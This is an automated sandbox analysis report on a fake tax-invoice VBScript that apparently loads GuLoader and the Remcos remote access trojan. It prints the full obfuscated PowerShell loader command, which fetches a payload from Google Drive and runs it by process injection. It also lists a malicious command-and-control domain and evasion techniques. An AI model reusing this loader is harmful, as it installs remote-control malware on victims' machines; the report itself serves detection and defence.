              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C729F5 push ebx; ret 8_2_03C72A53
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C705FA push edx; retf 8_2_03C705FB
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C70586 push es; iretd 8_2_03C70587
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C7439E push edx; iretd 8_2_03C743A4
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C7054D push ebx; retf 8_2_03C7054E
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C70F4D push esp; ret 8_2_03C70F4E
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C70379 push ebx; retf 8_2_03C7037A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C72CF1 push ebx; iretd 8_2_03C72CF2
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C748A9 pushfd ; iretd 8_2_03C748BC
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C73243 push ebx; iretd 8_2_03C7325E
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_03C73471 push ebx; iretd 8_2_03C73472

              Hooking and other Techniques for Hiding and Protection

              Source: Possible double extension: html.vbs Static PE information: NTS_eTaxInvoice.html.vbs
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5130
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4797
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7675
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2009
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: powershell.exe, 00000002.00000002.2381445256.000001D36D630000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_029F8870 LdrInitializeThunk,4_2_029F8870

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_1788.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C70000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 27DF97C
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable 
(Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#permit billeted livserfarent magmatism #>;$homologue='ensorrow';<#prossie udryddelseslejrenes interjectionalized jobannoncer anstillelser sdmefuldes bakkeen #>;$sledgehammered=$host.privatedata;if ($sledgehammered) {$genanvendelser++;}function demissioner($unlaconic){$conversations=$unengaging+$unlaconic.length-$genanvendelser;for( $kanaljen=5;$kanaljen -lt $conversations;$kanaljen+=6){$cochleous+=$unlaconic[$kanaljen];}$cochleous;}function complimentable($centronucleus){ . ($garanti) ($centronucleus);}$convectively=demissioner 'adhermpinoco.ivinzdesiligene lred,vlr.rria limo/mic.o5efter.e oti0.itdo phram(odiniwprvebisyndin brebdhid eo advewflgeps po s pacen ialtskygg kursu1mis a0indle. gstg0super;pr,va asep windk,ihalvpn enat6still4anabl; peri blaanxoppeb6smukt4count;filtr curetrbasi vbedoe:drypf1flo e2mando1soran.tipol0baggr)spotm angstgpho.oekongec.eigekn,wfoor all/tria 2svmme0sgeko1telem0d ool0 babe1rdk k0marki1recir b.jekfkalenitrl grhypoperehabfskimtoopht.x ffec/ch om1rund,2 scut1 ytre.ripen0undlb ';$saccharofarinaceous=demissioner ' postutek oskanteesk ivrvan e-riffiamultigweeklemel onidiort pr.t ';$dermoid108=demissioner 'tzolkhwynketindflt ga.gpp.rsosforga:secti/abern/femdodhospir starimoilsvkakkee chup.delafgdeflooredero,endrg monolfugtiearkiv.medvica,eneoko,mumobskn/ ailluharroc ince?mo emeergasx livspinobto pu rr valetdruek= forsdfortromatriwcon entillylgnat,oangreaso madgldsf&.uskeiparamdbacil= nive1pilloa fficjanticrkapil3fremmeprimrnkor,ouh,perzpa.aci bouckfeatukskytsznanzibteks mhaircnsvineb aflgdfoame6menedi mutaosols.0 gtpbarr sc acco5dekupvsendesalderiimmunijazzo6kommuaove.vl.aike1antit ';$henrykkelser=demissioner ' und.>ga.um ';$garanti=demissioner 'uns.dibespieune hxndend ';$funktionens98='zizit';$klemskrue67='\forsvarsundtagelsen.non';complimentable (demissioner 
's,udv$pottegnonmulskifeo kloebpolitater,ilph.ll:forbrtsubpraeuphok vatttalterrkommueudr ag acuubrn plpaahnedefinrstigmihalssnd.langun omsf rgro rrisrwar,odsolbanneglei hjdenagramgtilkr=antik$mutile udfln fendvnonfa:blatta frikp klasp tetidgnat.askoletmonu aindja+ srej$seksskcoleglbetake c vimbe.rispiruekind ur bekmubambue erni6hemap7 asp, ');complimentable (demissioner ' prmi$q ibbgstenklfiletoi desbchambaunderl spec: ardrnonmoelycopk rhebr proleskov ehazelr satreindbodsnoreenyh dstungs= eco,$ hjemd udlaestro rcologmindsaosampli mimod ko,m1 loat0affat8refor.bedris e prpj.gtrldehemi etabtsabia(arbej$uko lhho edeal,arnstok.r ,andy olvkungp kunleae wiktlsub osbemaleprak rslopl) mold ');complimentable (demissioner 'nedri[l.uwinstatieantictaqu n.faintsaris,esuccor bunkvsegm isubimcmisdeeskrivpsiffro arveiunplunp,rtntforvrm aligabed mndemisa,laasg,arneepregnrgeote]meggy: fors: neutsd sjueprovocganesuencryrguaiai proltjou nyexcepptankbrudenoohu kat hymnosummectil aoforbrlphen garn=under dic,[ es.in di peln svtfrems. mispsca lietitilc udsuutyk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: Yara match File source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              111
              Process Injection
              11
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)111
              Process Injection
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook12
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeylogging113
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              [Behavior graph (image not reproduced). Behavior Graph ID: 1522515; Sample: NTS_eTaxInvoice.html.vbs; Startdate: 30/09/2024; Architecture: WINDOWS; Score: 100.
              Processes: wscript.exe started powershell.exe; powershell.exe started msiexec.exe and conhost.exe.
              Network: powershell.exe to drive.google.com (172.217.18.14, 443, GOOGLEUS, United States) and drive.usercontent.google.com (142.250.186.33, 443, GOOGLEUS, United States); msiexec.exe to 172.217.16.206 (443, GOOGLEUS, United States).
              Signatures shown: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected GuLoader; VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Detected Remcos RAT.]

              Source | Detection | Scanner | Label | Link
              NTS_eTaxInvoice.html.vbs | 7% | Virustotal | | Browse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              https://apis.google.com | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              drive.google.com | 172.217.18.14 | true | false | | unknown
              drive.usercontent.google.com | 142.250.186.33 | true | false | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              a458386d9.duckdns.org | true | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://www.google.com | powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2343774310.000001D301DBC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://crl.microsoft | powershell.exe, 00000002.00000002.2381359043.000001D36D530000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.google.com/ | msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://go.micro | powershell.exe, 00000002.00000002.2343774310.000001D301459000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://aka.ms/pscore6lBcq | powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://contoso.com/ | powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://drive.usercontent.googhp | powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/License | powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/Icon | powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://drive.googP | powershell.exe, 00000002.00000002.2343774310.000001D301D7E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.google.com | powershell.exe, 00000002.00000002.2343774310.000001D301642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.usercontent.google.com/ | msiexec.exe, 00000008.00000003.2698660494.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2662532062.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://drive.google.com | powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://apis.google.com | powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.16.206 | unknown | United States | 15169 | GOOGLEUS | false
172.217.18.14 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.33 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1522515
                                              Start date and time:2024-09-30 09:56:09 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:NTS_eTaxInvoice.html.vbs
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winVBS@9/7@3/3
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 79%
                                              • Number of executed functions: 51
                                              • Number of non-executed functions: 23
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs
                                              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.190.159.75, 20.190.159.73, 20.190.159.23, 40.126.31.69, 20.190.159.4, 20.190.159.68, 20.190.159.64, 20.190.159.2
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                              • Execution Graph export aborted for target msiexec.exe, PID 1632 because there are no executed function
                                              • Execution Graph export aborted for target powershell.exe, PID 1788 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 1812 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:57:19 | API Interceptor | 87x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs | malicious | GuLoader | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | Urgent Quotation Notification_pdf.vbs | malicious | Unknown | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | http://hrlaw.com.au | malicious | Unknown | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | CAPE MARS VSL'S PARTICULARS.docx.exe | malicious | AgentTesla, PureLog Stealer | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | MV TASOS Vessel's Details.docx.exe | malicious | AgentTesla, PureLog Stealer | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | AgentTesla | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | https://okfun188.com/ | malicious | Unknown | 142.250.186.33, 172.217.18.14
3b5074b1b5d032e5620f69f9f700ff0e | https://mukirecords.com/ | malicious | Unknown | 142.250.186.33, 172.217.18.14
37f463bf4616ecd445d4a1937da06e19 | Faktura_82666410_1361590461#U00b7pdf.vbe | malicious | Remcos, GuLoader | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Stealc, Vidar | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Stealc, Vidar | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exe | malicious | GhostRat, Mimikatz, Nitol | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Clipboard Hijacker, Vidar | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 172.217.16.206, 142.250.186.33
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | malicious | Unknown | 172.217.16.206, 142.250.186.33
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):8003
                                              Entropy (8bit):4.840877972214509
                                              Encrypted:false
                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
